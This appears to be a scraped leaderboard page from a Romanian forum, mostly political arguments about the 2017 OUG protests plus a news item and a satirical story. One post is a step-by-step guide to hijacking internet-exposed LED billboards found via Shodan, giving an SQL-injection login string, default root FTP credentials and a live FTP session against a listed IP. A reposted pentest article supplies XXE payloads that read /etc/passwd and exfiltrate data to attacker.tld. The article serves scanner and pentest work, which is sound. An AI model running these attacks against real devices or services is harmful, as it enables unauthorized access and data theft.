Leaderboard
Popular Content
Showing content with the highest reputation on 02/04/17 in Posts
-
Hai sa mananc si eu un cacat pe topicul asta, ca vad ca asa e trendul. Sunt in strada din prima seara dar nu protestez pentru ce protesteaza toti de pe langa mine si anume: 1. Toti care sunt in strada scandeaza impotriva OUG si mai exact impotriva pragului ala de 200mii pt abuz in serviciu. Si ca domnle vezi ca s-a dat drumul la hotie. Adica pot sa furi 199mii si scapi. GRESIT PULETILOR! GRESIT! Cand furi ceva nu esti acuzat de abuz in serviciu ci de furt. OUG-ul asta nu se aplica la dosarele deja existente (dragnea, oprea etc) ca nu poti aplica retroactiv. Modificarile vor fi valabile pt dosarele viitoare. Deci dragnea nu scapa de dosarul de instigare la abuz in serviciu ci scapa doar de dosarul cu referendum(inchisoare cu suspendare; si scapa de asta datorita legii gratierii nu oug pt codul penal).(inca o muie pt intoxicatori) NU CONFUNDATI ABUZUL IN SERVICIU cu FURTUL sau cu LUAREA DE MITA. asa ca multa MUIE la toti intoxicatorii. 2. *si aici va las sa va documentati singuri si sa trageti concluziile: eu protestez pt modificarile aduse CONFLICTULUI DE INTERESE (si aici vor scapa foarte multi, chiar vor scapa; printre ei se numara: Ponta, UDREA, Ioana Basescu, SOVA, BLAGA, Mazare si multi altii) Informeaza-te corect. Tu nici nu stii de ce protestezi, doar ti se pare cool ca esti cu tovarasii tai caterinca, hoa hoa, jos pulea, hotilor, rime, caterinca, flower power... _)_ PS: alta intoxicare ca golanii de s-au sicanat cu jandarmii erau din galeria dinamo. o mizerie grasa si fara dovezi. a aruncat-o un BOU la tv sau pe facebook si OILE(asta reprezinta 90% din cei din strada) imediat au halit-o. PS2: TARA HOTILOR SI IPOCRITILOR!4 points
-
@tjt ai si tu dreptate in mare parte dar: - eu am explicat faza cu furtul pentru ca asa gandeste lumea in strada(citeste pancardele). - ce ai prezentat tu cu informatii lictitatii si presiuni pt contract = trafic de influenta nu abuz in serviciu (intreaba un avocat, nu trebuie sa ma crezi pe mine) nota bene: nu poti "fura" prin abuz in serviciu, nu poti decat sa faci paguba, paguba pe care o vei plati din buzunarul tau dupa ce statul te va da in judecata pentru recuperarea banilor si iti va pune sechestru pe tot ce ai. Zic asta pentru ca cei din strada vorbesc despre cum ca oricine poate FURA sub 200mii si nu merge la puscarie. Total INCORECT! Informare ZERO barat! - dragnea este acuzat conform dosarului de: INSTIGARE la abuz in serviciu - dragnea scapa de dosarul cu referendumul (adica inchisoare cu suspendare, nu o sa mai fie un penal si va putea fi premier ) datorita legii gratierii nu a OUG pentru modificarea CP. - legat de dosarele existente: nu se poate aplica; nu poti modifica o lege pentru a da o solutie/incadrare RETROACTIVA - problema acestei OUG este la Conflictul de interese - aici sunt manariile din spatele acestei "urgente in miez de noapte de aplicare a OUG" cat despre caterinca: - te invit daca mai iesi in strada sa te plimbi printre oamenii prezenti: vei descoperi mai multa caterinca decat concentrare (undeva la un mix de 70% caterinca - 20%) - oricine ar fi fost la guvernare ar fi dat o lege asemanatoare pentru propriul interes...protestez impotriva OUG dar nu incep sa scandez ciuma rosie sau alte cacaturi care nu conteaza, chiar nu conteaza pentru schimbare....asta inseamna sa fiu SUBNUTRIT intelectual, condus de URA, manipulat si impins de massmedia ...aceeasi mentalitate ca si atunci cand s-a iesit in strada pentru a da jos guvernul boc si/sau pe basescu... nu ati inteles ca ei, toti, sunt la absolut la fel... s-au tot rotit atatia ani de zile si o sa se mai roteasca intre ei si de acum in colo. ganditi-va la o sinusoida, asa suntem ni in ROMANIA din 89' incoace, si nu din cauza psd-ului sau a pdl-ului, ci din cauza mentalitatii noastre. (nu mai aduc aminte si de ponta/colectiv ca se intelege ideea de baza) Romanul nu este educat. Crede ca are o gramada de drepturi si prea putine obligatii fata de tara, constitutie si fata de cel de langa el. *: ce-i drept la un moment, am fost asa de botanist cu USB-ul/USR crezand ca in sfarsit avem cu cine... o mare vrajeala, aceeasi hoti cu alte fetze. **: eu sunt HOT la fel ca 99,99% dintre romani, am facut evaziune, am ars-o la negru, am inselat statul cat de mult am putut eu, etc. BAI NENICA, dar nu ma vezi pe mine in strada sa strig HOTILOR HOTILOR! Nu sunt ipocrit! Pai Hotii striga Hotii?! Asa vreti voi schimbare? ***: si intrebarea de pe buzele tuturor la sfarsit: pana la urma pe cine sa aleg? apai "Alta intrebare"?! Nu ai deocamdata pe cine, parerea mea. Miza nu este sa scape X Y de puscarie. Miza consta in cine are monopolul asupra fraielor economice si strategice ale tarii ! Asta imi place mie la democratie, ca avem opinii diferite si ca putem avea un dialog normal si civilizat. Multumesc si weekend placut.3 points
-
Vă mai amintiţi de laptopul cu 3 ecrane prezentat de Razer la CES? A fost furat Adrian Popa - 9 ian 2017 Razer a făcut valuri la CES 2017 cu laptopul său cu trei ecrane. Deşi un prototip, dispozitivul arată ce se poate face cu tehnologia de azi. Computerul a atras din nou atenţia după ce a fost furat de la salon, în ultima zi. Hoţul a furat două concepte ale companiei, printre care şi laptopul cu trei ecrane. „Am fost informat că două dintre prototipurile noastre au fost furate astăzi din cabina de la CES”, a scris pe Facebook şeful companiei, Min-Liang Tan. Organizatorii CES şi poliţia au deschis o anchetă şi încearcă să găsească hoţul. Nu este prima dată când Razer atrage atenţia hoţilor. În 2011, două prototipuri de laptopuri Blade au fost furate din centrul de cercetare şi dezvoltare al companiei din San Francisco. Nu este exclusă nici varianta spionajului industrial. Este foarte posibil ca dispozitivele concept să fi fost furate de o companie rivală pentru a fi studiate în detaliu. Sursa: http://www.go4it.ro/curiozitati/va-mai-amintiti-de-laptopul-cu-3-ecrane-prezentat-de-razer-la-ces-a-fost-furat-16053902/2 points
-
^ daca ati fi citit cu adevarat ordonanta si v-ati fi informat ati intelege subtilitatea actului. Da, procesul lui Dragnea la prima vedere nu este afectat de OUG, dar aici intervine partea interesanta. Si citez din OUG: "Fapta functionarului public ... prin aceasta cauzeaza o paguba materiala mai mare de 200.000 lei ... se pedepseste cu inchisoare de la 6 luni la 3 ani sau cu amenda." Functionarul public nu fura gen "luam din buget si bag in buzunar", nu se intampla asa, niciodata nu s-a intamplat asa. Asadar acuzatia de furt iese din discutie. Modul in care se procedeaza este urmatorul: se acorda informatii despre anumite licitatii, se fac presiuni asupra anumitor oameni pentru a se acorda contracte direct catre anumite firme prietene la care sunt actionari sau au rude actionare si astfel se produce abuz in serviciu si nicidecum furt. Daca prejudiciul e sub 200.000 lei nu se mai considera fapta penala ci fapta administrativa --- adica il da in judecata si spera ca o sa se recupereze banii. Legat de procesul lui Dragnea, tot dosarul e construit in jurul abuzului in serviciu, fapta de fals intelectual a derivat din abuzul in serviciu. Nu e greu de demonstrat ca daca 'abuzul in serviciu' nu mai este valabil, nici fapta care a derivat din el nu ar mai trebui sa fie existenta. Legat de faptul ca nu se aplica dosarelor existente, citez din lege: "În cazul în care de la săvârşirea infracţiunii până la judecarea definitivă a cauzei au intervenit una sau mai multe legi penale, se aplică legea mai favorabilă. ". Indiferent daca lumea iese pentru "caterinca", din convingeri personale sau ca se plictisesc acasa e un semn ca exista o nemultumire. Caterinca daca vrei poti sa o faci si in fata blocului la un bidon de bere fara a mai da bani pe bilet de metrou/autobuz....2 points
-
Lui Ion nu ii curge scuipat din gura de prost si nu isi pierde vremea pe toate site-urile de petitii online aparute ca ciupercile dupa ploaie. Ion stie ca asa-zisele petitii sunt egale cu 0 si pe cei din legislativ si executiv ii doare fix in 3 litere de astfel de petitii. Ion stie ca pentru a avea efect, astfel de petitii trebuie recunoscute in mod oficial, gen https://petition.parliament.uk/petitions Ion mai si citeste T&C pe site-urile care s-au obosit sa le scrie si intelege ca astfel de mizerii sunt facute exclusiv pentru a colecta adrese de mail valide a prostimii pe anumite nise (destul de pretioase in ziua de azi). Si nu in ultimul rand, Ion stie ca datul de like si share pe Facebook sau retweet sau click pe o "petitie" online este egal cu zero barat si ca trebuie defapt sa exprime acest lucru in mod vocal, in strada. Fiti ca Ion!2 points
-
2 points
-
Step 1. Register to shodan Step 2. Look up: title:"lednet live system" You'll find some! Example: 186.206.188.175:8060/en/main.html How to hack it? Well the Username Parameter is vulnerable to SQL Injection...... So to login, paste -1558" OR 9005=9005 AND "UxGI"="UxGI in the username parameter and anything in the password input. Now click login! Also another vulnerability is a default password vuln. You can basically get root ftp access to all of these billboards.... Username: root Password: 111111 $ ftp 186.206.188.175 Connected to 186.206.188.175. 220 Welcome to blah FTP service. Name (186.206.188.175): root 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> cd / 250 Directory successfully changed. ftp> ls 229 Entering Extended Passive Mode (|||41314|). 150 Here comes the directory listing. drwxr-xr-x 1 0 0 1464 Jan 01 1970 bin lrwxrwxrwx 1 0 0 21 Jan 01 1970 c: -> /usr/local/playdata/c lrwxrwxrwx 1 0 0 21 Jan 01 1970 d: -> /usr/local/playdata/d drwxr-xr-x 7 0 0 0 May 21 18:08 dev lrwxrwxrwx 1 0 0 21 Jan 01 1970 e: -> /usr/local/playdata/e drwxr-xr-x 1 0 0 748 Jan 01 1970 etc lrwxrwxrwx 1 0 0 21 Jan 01 1970 f: -> /usr/local/playdata/f drwxr-xr-x 1 0 0 36 Jan 01 1970 home drwxr-xr-x 1 0 0 1868 Jan 01 1970 lib lrwxrwxrwx 1 0 0 11 Jan 01 1970 linuxrc -> bin/busybox drwxr-xr-x 1 0 0 32 Jan 01 1970 mnt drwxr-xr-x 1 0 0 0 Jan 01 1970 opt dr-xr-xr-x 51 0 0 0 Jan 01 1970 proc drwxr-xr-x 1 0 0 116 Jan 01 1970 root drwxr-xr-x 1 0 0 1332 Jan 01 1970 sbin drwxr-xr-x 12 0 0 0 Jan 01 1970 sys drwxrwxrwt 6 0 0 720 May 21 18:16 tmp drwxr-xr-x 1 0 0 108 Jan 01 1970 usr drwxr-xr-x 3 0 0 672 Jan 01 1970 var drwxr-xr-x 4 0 0 288 Jan 01 1970 www 226 Directory send OK. ftp> Copiat de le HF...1 point
-
In this article I present some thoughts about generic detection of XML eXternal Entity (XXE) vulnerabilities during manual pentests supplemented with some level of automated tests. The ideas in this blog post (derived from experiences of several typical and untypical XXE detections during blackbox pentests) can easily be transformed into a generic approach to fit into web vulnerability scanners and their extensions. This is done by demonstrating an example of where service endpoints that are used in a non-XML fashion can eventually be accessed with XML as input format too, opening the attack surface for XXE attacks. At the time of writing this article I've started to develop a Burp Extension ("Generic XXE Detector") and will eventually also transform it into a ZAP extension, letting this kind of detection approach make its way into these scanners - if I find the time to complete that. XXE detection in service endpoints During blackbox pentesting one often gets in front of some service endpoints (mostly REST based ones used from within single-page apps in browsers). These RESTful endpoints often offer JSON as transport format, but many server-side development frameworks (like JAX-RS for Java based RESTful services) make it very easy for developers to offer also an XML based data exchange format for input and/or output out-of-the-box. If such alternative formats exist, they can easily be triggered using proper Content-Type request header values (like text/xml or application/xml). So the challenge is to find these endpoints which also accept XML as input format, even though the client (webpage) only uses JSON or direct path- or query-params to access the service. To scale this from a manual pentesting trick into a way of automation, the tool to scan for this needs a generic XXE detection approach, which can easily be applied to every URL the active scanner sees in its scope during a pentest. In one very interesting case of an XXE finding inside a Java based service endpoint (during a blackbox pentest) I came across a service endpoint that only had path- and query-params as input source and responded with JSON. Basically it was even a simple GET based service (no POST there). So this didn't really look much like "let's try some XXE Kung-Fu here...". Especially the tools including Burp didn't find any XXE at this spot when actively scanning it (even with thorough scanning configured). But after several manual tries, I managed to squeeze an XXE out of it, since it indeed was a REST service which also accepted XML out-of-the-box. I had to apply several tricks though, in order to get the XXE to work: I tried to convert the request from a GET to a POST in order to also send XML as the request body. Unfortunately POST was not accepted (as the service was only mapped to GET), so I had to stick to GET requests. I removed the query-params as well as path-params from the request URL in order to not let these get picked up by the service. As this was a blackbox pentest, I can only assume that removing the query-params led towards a mode of the service endpoint accepting the input also via other formats (i.e. when automatically mapped from XML input for example). Accessing the service without the used path- and query-params resulted in an error message (no input data available). Even though only GET could be used, I then added the Content-Type: application/xml request header and some non-conforming invalid XML as the request body: This was rewarded with an XML error message, showing that some kind of parsing process picked up the body payload of the GET request, i.e. making it an interesting target to investigate further. Adding the path- and query-params back to the request resulted in a business error message, so that the exploit seems to require to remove them, as they might take precedence over the XML body otherwise. As I then had a way of letting the server parse my XML and received at least replies with some technical error messages from the parser, I tried to use the XXE to exfiltrate some data (like /etc/passwd or just listing of base directory /): As the expected XML format for this kind of service call was not known to me (blackbox assessment), I had to use a more generic approach, which works even without placing the entity reference in the proper XML element. Also (as tested afterwards) when the server got the XML as expected, it didn't return any dynamic response, so only the technical error was echoed back. Of course the great out-of-band (OOB) exfiltration technique by T.Yunusov and A.Osipov would work as a generic approach to exfiltrate content in such a scenario. But since (at least for current Java environments) this kind of URL-based OOB exfiltration only allowed to exfiltrate contents of files consisting of only one line (as CRLFs break the URL to the attacker's server), I managed to combine it with the technical error message the server replied and read the data from there: The idea is to use the trick of passing the data carrying parameter entity itself into another file:/// entity in order to trigger a file-not-found exception on the second file access with the content of the first file as the name of the second file, which was thankfully echoed back completely from the server as a file-not-found exception (so pure OOB exfiltration wasn't required here): Attacker's DTD part applying a file-not-found exception echo trick (hosted on attacker's server at http://attacker.tld/dtd-part): <!ENTITY % three SYSTEM "file:///etc/passwd"> <!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>"> Request (exploiting the XXE like in the regular OOB technique by Yunusov & Osipov): GET /service/ HTTP/1.1 Host: example.com:443 Content-Type: application/xml Content-Length: 161 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" > %one; %two; %four; ]> Response (delivering the data as file-not-found error message): HTTP/1.1 400 Bad Request Server: Apache-Coyote/1.1 Content-Type: text/html Content-Length: 1851 Connection: close javax.xml.bind.UnmarshalException - with linked exception: [java.io.FileNotFoundException: /root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin ... ... ... ... ... ... ... ... ... apache:x:54:54:Apache:/var/www:/sbin/nologin (No such file or directory)] Using this file-not-found exception echo trick to read the data not only solved the "one line only" exfiltration problem, it also lifted some restrictions that existed with XXE exploitations when used directly inside the XML elements: Contents of files that contain XML special meta chars (like < or >) would break the XML structure. This is no longer a problem with the above mentioned trick. After that all worked pretty well, I discovered that Ivan Novikov has recently blogged about some pure OOB techniques that even exfiltrate data under Java 1.7+ using the ftp:// scheme and a customized FTP server. This would have worked in the above mentioned scenario as well - even when the server does not return technical error messages, as it is a pure OOB exfiltration trick. As a small side note: This file-not-found exception echo trick might also be used as an XSS in some cases by trying to echo <script>alert(1)</script> as the filename. Often these technical error messages might not be properly escaped when echoed back, compared to situations where non-error-messages originating from regular XML element input will be reflected. But this XSS is rather difficult to exploit in real scenarios, since it would not be easy to trigger the desired request from a victim's browser – if not even impossible depending on the http method (in this example a strange GET with request body). Automating this as a scanning approach Finding such an XXE vulnerability in a service endpoint using only manual pentesting tricks (as the scanners didn't detect it) made me think of a generic approach that is capable of detecting such a vulnerability automatically. Basically the scanning technique should try this on every (in-scope) request it sees, even when the request in question does not contain any XML data (as in the scenario of the RESTful service above that used mainly JSON). So here are the ideas I came up with (which I will also prototype as a Burp and/or ZAP extension soon). The scanner should perform the following steps on every request it is allowed to scan actively. This should be done in addition to any regular XXE detections the scanner already has in place. The following technique is just intended to detect scenarios like the above mentioned: Issue the request with original path- and/or query-params and with the http POST method as well as its original http method (even GET) and place a generic DTD based payload in the request body that directly references the parameter entity, like the following: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM "file:///some-non-existing.file" > %xxe; ]>. Don't forget to add the Content-Type: application/xml header to the request (also try with text/xml as well). If the response contains an error like the following (effectively echoing the filename back in some kind of file-not-found message), flag it as potential XXE: javax.xml.bind.UnmarshalException - with linked exception: [java.io.FileNotFoundException: /some-non-existing.file (No such file or directory)] You can also compare the response content of the previous step of accessing a non-existing file with accessing a valid existing file like /etc/passwd. This might catch some differences between the error responses of non-existing files vs. existing files that do not contain valid content to place inside the DTD. If it is also possible to echo in the file-not-found exception message some <script>alert(1)</script> as the filename, flag it as XSS too, but one that is difficult to exploit (and depending on the http method required eventually impossible to exploit). If the steps above didn't trigger an XXE condition, try to remove the original request's query-params and try the above steps again. Finally try to strip each path-param as well (just in case the service is picking this up also and then does not try to access input from the XML body instead) and retry step one. If the steps above didn't trigger an XXE condition, try to use the well-known OOB techniques (see the referenced links above for more details regarding these cool tricks): Use a payload like the following (still having the Content-Type header set to application/xml): <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM"http://attacker.tld/xxe/ReqNo" > %xxe; ]>, where ReqNo is replaced by a unique number for every request scanned. This unique number is required (when parsing the attacker's webserver logs) to correlate log entries with the scanned requests that should then be flagged as XXE candidates. The best results would be gained if the scanner offers some kind of drop-in where (at the end of the pentesting assignment) the observed webserver logs (of the attacker's webserver) can be given to the scanning engine for checking against the issued OOB request numbers for matches. If the steps above didn't trigger an XXE condition (eventually because the server cannot access the attacker's webserver), try to use established DNS-based OOB exfiltration techniques, where part of the domain name contains the XXE request number ReqNo from the previous step, like in the following payload: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM"http://ReqNo.xxe.attacker.tld" > %xxe; ]>. That way at least the DNS resolution to the attacker's domain via its DNS server might be used to trigger the XXE match when after the pentest the logs of the DNS server are parsed by the scanner to correlate them with the scanned requests. If the steps above didn't trigger an XXE condition, we have to go completely blind only on sidechannels like timing measurements: This could be done by checking various internally reachable ports while measuring the response time of the payload <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://127.0.0.1:80" > %xxe; ]> versus the response time of <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://127.0.0.1:9876" > %xxe; ]> Similar checks can be performed with file:/// URLs by accessing small vs. big files. When being a risky scanner, you can try to measure the increase in response time when accessing /dev/zero as the file (eventually killing the thread on the server). Also a risky scanner can try to measure the processing time of nested (non-external) expansions like in the "billion laughs attack". Note that in the above scenarios the concrete XML format does not need to be known to the scanner, so it can easily apply this scanning technique on requests even when they haven't used any XML during passive observations. All XML payloads are completely self-contained within the DTD section. The idea is to issue this kind of scan on every request to automatically identify places where service endpoints or alike also offer to be accessed using XML, as is the case with some RESTful development frameworks. Some of the XML DTD payloads above (those using the OOB requests to detect XXE either by inspecting the attacker's webserver logs or measuring the timing differences) can even be shortened to a pure external DTD approach like this: <!DOCTYPE test SYSTEM "http://attacker.tld/xxe/ReqNo"> or <!DOCTYPE test SYSTEM "file:///dev/zero">. But the longer tests presented above give more confidence to the XXE finding, since the shorter version only validates that external DTDs and not entities can be loaded. Conclusion As a Pentester Watch out for any service-like endpoints in the application to pentest and try to force them to accept XML, even when the usage of these endpoints from within the application utilizes other kinds of input formats (like query- or path-params or JSON post bodies). In a lucky case where the endpoint is also configured to accept XML, try to further exploit this as an XXE condition. As a Scanner Vendor Try to incorporate ideas like the steps presented in this article into your scanning engines augmenting them with automated parsing of log files to ease generic XXE detection with OOB techniques, even when scanning large attack surfaces (and make the attacker's exfiltration URL configurable). Source :1 point
-
https://medium.com/@contact_55146/grindeanu-sau-oug-13-2017-6ebaad2547c0#.be7bq39jo Worth a laugh1 point
-
1 point
-
Pe principiul "pe ei si pe mama lor" - https://www.ziarulincomod.ro/update-ploiesteanul-care-a-oferit-bannere-gratuite-protestatarilor-calcat-de-politisti-la-nici-o-zi-de-la-anunt/1 point
-
1 point
-
Am gasit acest infografic, m-am gandit ca poate ii este util cuiva. Varianta pdf aici. Pentru "expertii" care sa gasesc sa spuna ca nu-i asa, ca-i invers: whatever, talk to the hand!1 point
-
Si uite asa se adeveresc vorbele "mincinosului" de Tariceanu: "La întrevederea pe care am avut-o cu preşedintele a doua zi după anunţarea rezultatelor alegerilor domnia sa mi-a spus foarte direct că va face tot ce îi stă în putinţă pentru a nu numi un premier din partea PSD şi pentru a evita aducerea PSD la guvernare. A spus că vrea să declanşeze un război total, lucru pe care astăzi îl vedem prinzând contur" Sursa1 point
-
Cred ca zice de astia http://www.worldit.info/noutati/romanian-national-security-rns-pune-ungaria-la-pamant-avram-iancu-este-motivul/1 point
-
^ This. Asta ar trebui pusa pe un panou si agatata in mijlocul oilor de la proteste. Am auzit multa lume care se duce la protest pe principiu': "Hai coaie sa mergem si noi acolo, apoi dam o bere ca baietii". Asta e mentalitatea romanului si d-aia nu o sa se faca nimic dupa aceste proteste. Romanu' nu stie ce vrea si protesteaza pentru habar nu are ce. RIP Romania.1 point
-
1 point
-
1 point
-
1 point
-
(Via Liviu Iancu - genial textul!) Ca să pună gheara pe pământurile și casa dărăpănată a Maricicăi, proasta satului, Vasile a trebuit s-o ia cu acte. Fost secretar de partid pe vremea lui Ceaușescu, Vasile avea vorbele la el și nu i-a fost greu s-o momească pe femeie cu câte-n lună și-n stele. I s-au îngălbenit dinții și i-a încărunțit mustața de atâtea și-atâtea vorbe dulci pe care i le-a înșirat seara târziu, tolănit picior peste picior pe băncuța șubredă din fața porții ei. I-a promis că o să-i cumpere rochii și pantofi, că o să-i asfalteze drumul din poartă și până în uliță, că o să-i plătească lu' tac-so spitalizarea și c-o să pună o vorbă undeva, unde știe el, ca să-i dubleze pensia mă-sii. I-a mai zis că va repara gardul, iar în locul veceului prăpădit din fundul curții îi va ridica un bloc care să se învârtă după soare. Maricica îl asculta fascinată din buzele porții și se mira cum în capul lui mic puteau să se aglomereze sute de idei deștepte, ca oile în staul. Spre seară, înainte să plece, Vasile o lua în brațe și îi șoptea zâmbind pe sub mustață că are pentru ea ceva uriaș, ce crește cu 5% în fiecare an. Maricica îl respingea neconvingător, cu podul palmei, și chicotea cu cealaltă mână la gură, ca Dan Diaconescu. Băiat de la țară, fără prea multă școală, Vasile părea de 1.000 de ori mai descurcăreț decât Niky, agronomul cu studii la Bruxelles. Niky îi bătea și el în poartă, dar în miezul zilei, însă era timid și nu-i promitea niciodată nimic. Ba dimpotrivă, de parcă ar fi vrut s-o convingă să nu-l ia de bărbat. Zicea că n-o să aibă o viață ușoară dacă se mărită cu el, însă în timp și cu multă muncă, cu studiile lui și pământurile ei, vor trăi ceva mai bine. Era clar că Niky n-avea papagal, deși uneori, când ridica ochii din pământ, o privea fix, de parcă ar fi vrut să-i spună mai multe. - Știi... Vasile nu e un tip serios. N-o să se țină de promisiuni, șoptea el, dar nu îndrăznea să zică mai mult. Mă-sa, femeie cu riduri cât degetul, trecută prin viață, își făcea cruce când o asculta pe fată: - Ce bărbat e ăla, Maricico, de vrea să te convingă cu ce nu poate "celălant". Să-ți spuie mai bine ce poate el să facă pentru tine! Avea dreptate bătrâna. Niky era moale ca basmaua. Ce bărbat e ăla care nu te proptește în stâlpul porții și nu-ți cotrobăie pe sub fustă? Ce să faci cu un mototol care nu știe nici măcar să promită? Și nici dușmanul nu știe să și-l bârfească așa cum trebuie. Păi să fi auzit ce era la gura lui Vasile când vorbea despre el! - Cum Dumnezeu, Maricico, să-ți dai tu pământu' moștenit de la tac-to mare, care a luptat în războaie cu turcii, tătarii și barbarii unuia care nici măcar nume românesc nu are? Ce e aia <<Niky>>? Nu putea să-i zică și mă-sa Nicu? Maricica îi dădea dreptate și râdea mărunt, până când în jurul nasului îi înfloreau balonașe mici de muci. Se simțea bine cu Vasile și avea încredere în el. Îi plăceau promisiunile lui și simțea că lângă el o să ajungă într-un an, din fata simplă cu basma ruptă, care mulge vaca și are grijă de porci, o boieroaică bengoasă. Se și vedea răsturnată cu cracii-n sus pe pereți, ascultând Taraf TV și numărând banii care se vor înmulți ca șobolanii. Pe la începutul lui decembrie au făcut nunta și l-a luat de bărbat. Vasile s-a instalat în casa ei și așa a trecut o săptămână. Nu i-a reparat gardul și nici nu i-a asfaltat drumul. I-a spus că pentru rochii și pantofi trebuie să aștepte până la anu', când o face rost de bani. "Alte lucruri sunt mai urgente, Maricico, dar asta nu e treabă pe care s-o discut cu femeia", a asigurat-o el. Peste câteva zile i-a bătut la ușă un vecin: Cătălin, un nene cărunt și cu figură de bivol constipat, pe care-l știa tot satul că ținuse șase neveste și toate îl părăsiseră. La 60 de ani, când alții ies la pensie, el s-a însurat a șaptea oară. Popa îi șoptise atunci la ureche, în biserică: "Bre, nea Cătăline, nu trebuie să le iei pe toate de nevastă ca să le convingi să bage milogu-n traistă! Merge și fără acte!". Vasile s-a închis cu el în camera de la drum și au discutat până în zori. Maricica l-a tot așteptat cu ciorba rece pe masă, dar degeaba. Când și-a vârât capul pe ușă, mai spre miezul nopții, Vasile a repezit-o: - Du-te, fă proasto, și te culcă! Nu vezi că discutăm probleme importante? Maricica s-a perpelit în pat vreo oră, dar a adormit fericită, cu gândul că bărbatul ei a ajuns mare, dacă vine un barosan despre care se spune că e al doilea om în sat și se sfătuiește cu el în miez de noapte. A doua zi, Vasile s-a închis din nou în camera de oaspeți, doar că pe lângă bătrânelul însurățel au mai venit și alții, cu cefe groase, cercei în urechi și sirene tatuate pe braț. Maricica l-a recunoscut printre ei pe fratele unui borfaș care îi furase anul trecut rațele și intrase la bulău. Mai era acolo și un tinerel al cărui tată fusese arestat pentru că violase două babe din sat. Discuția se aprinsese și Maricica mai auzea din când în când frânturi de frază: "se chinuie în pușcării", "șobolani", "gândaci", "să-i ajutăm", "e urgent". - Ce faci, Vasile, ne bagi toți hoții...?, s-a plâns de dimineață Maricica, dar nici n-a apucat să termine fraza, că palma grea a bărbatului i s-a lipit de basma. A urmat o săptămână în care casa i s-a umplut cu rude de hoți, criminali, violatori și politicieni corupți. Vasile parcă turbase. Făcea planuri peste planuri. Își mușca mustața, iar ochii îi scăpărau plini de ură, ca la pisicile sălbatice. - Vasile, ce mi-ai promis tu mie, ca să te iau? Vasile scrâșnea din dinți și îi mai bascula un capac peste față. Cu ochii vineți și nasul umflat, femeia ajunsese de râsul vecinilor. - Lasă-l, Maricico, dă-l dracu' de penal, nu vezi că te bate? Maricica își fornăia mucii și-și trăgea basmaua pe frunte, ca să-și acopere ochii vineți și umflați. - Ei, era și el nervos... , îl scuza ea. - Dar nu vezi că te-a momit cu luna de pe cer și nu ți-a dat nimic? Nu vezi că tot în fundul curții te caci și tot cu ligheanul între picioare te speli? Ție îți place că în loc să-i ajute pe mă-ta și pe tac-to, să-ți asfalteze ulița și să-ți repare gardul, ți-a umplut casa de hoți? - Și ce să fac, tanti? Ce să fac? - Să-l dai dracu' afară din casă, Maricico. S-o iei pe mă-ta, pe tac-to și pe verii tăi de peste gârlă și să-i spuneți că ori termină cu pușcăriașii și se ține de ce ți-a promis, ori pleacă din casa ta. - Nu pot, tanti, că l-am ales acum o lună. A fost cu nuntă, cu dar, cu lăutari... - Și ce, fă, dacă ai fost proastă și l-ai ales, acum îl lași să-ți facă ce vrea el? Dacă ți se cacă în pat în fiecare dimineață, tu taci și nu zici nimic, pentru că l-ai ales acum o lună? Sătul de ceartă, Vasile a luat-o deoparte și i-a explicat cum stau lucrurile. El și prietenii lui voiau să forțeze închisoarea de la marginea comunei și să le dea drumul celor care zăceau închiși acolo fie pe nedrept, fie pentru niște găinării mici. Zicea că se cheltuiesc bani mulți cu ei și că, după ce li se dă drumul, banii ăia o să se împartă la oameni. O să se dea pensii, salarii și burse la studenți din ei, se vor repara străzi și se vor vopsi gardurile. Ăia din pușcării, odată eliberați, vor deveni brusc oameni cumsecade și nu vor mai fura, viola sau tâlhări. - Astea sunt problemele importante ale comunei, Maricico, ascultă-mă pe mine. Maricica l-a crezut, că doar ea, de bună voie și nesilită de nimeni, îl alesese pe omul ăsta cu o lună în urmă. S-a așezat în fund, pe marginea șanțului, și prin găurile din gard, mari cât dovleacu', a văzut veceul de lemn putred din fundul curții, aplecat într-o rână, ca un bețiv ce se sprijină de un zid. Acolo, în locul lui, Vasile îi promisese că va ridica un bloc frumos, cu încălzire centrală și apă la chiuvetă. Apoi, îi spusese el, va asfalta șanțul și va lăsa doar un firicel limpede de apă, unde se vor bălăci pești grași și colorați. Ei doi se vor muta în tot blocul ăla, iar pe un etaj întreg va fi baia, cu duș, piscină, veceu cu colac, săpun, periuțe de dinți și creme cu care să te ungi din cap până-n picioare. Maricica s-a mirat cât de frumos se țes toate planurile și, visând deja la vremurile bune care o așteaptă, s-a gândit cu milă la bieții oameni din pușcării, care o duc ca vai de mama lor. Și de-acolo, din șanțul plin de noroi, s-a întrebat pentru prima dată în viața ei dacă nu cumva din invidie vecinii o porecliseră proasta satului.1 point
-
1 point
-
Vreau să spun că prostestul în primul rând este o mişcare politică în opinia mea, apoi a degenerat puţin datorită influenţei trădătorilor, corupţilor, serviciului de informaţii şi unor grupuri de manipulatori care pun paie pe foc. Eu şi alţii suntem provocaţi pentru a se crea haos mai mare ... chiar de servicii, oameni din MAI de asemenea au informaţii despre acest lucru. Sunt mulţi oameni monitorizaţi fără motiv şi provocaţi, mă abţin să nu le fac jocul, cred că în ţară sunt oameni inteligenţi ce au înţeles situaţia şi nu vor face jocul unor trădători, hoţi, corupţi, santajişti şi serviciilor secrete străine. Oricum se pun baie pe foc chiar din interiorul MAI, SRI, SIE. Habar nu am ce este în mintea lor limitată, vor să bage ţara într-un război civil şi alţii ca mine să fie provocaţi pentru a o băgă (într-un mod inteligent) pe plan extern? Se lucrează împotriva intereselor naţionale şi siguranţei naţionale chiar din interior. Cred că realizează că dacă se răspundea la fel de agresiv azi noapte, mureau câţiva şi începea ceva se dorea apoi nu doar alt guvern ci şi demiterea preşedintelui ş.a.m.d.1 point
-
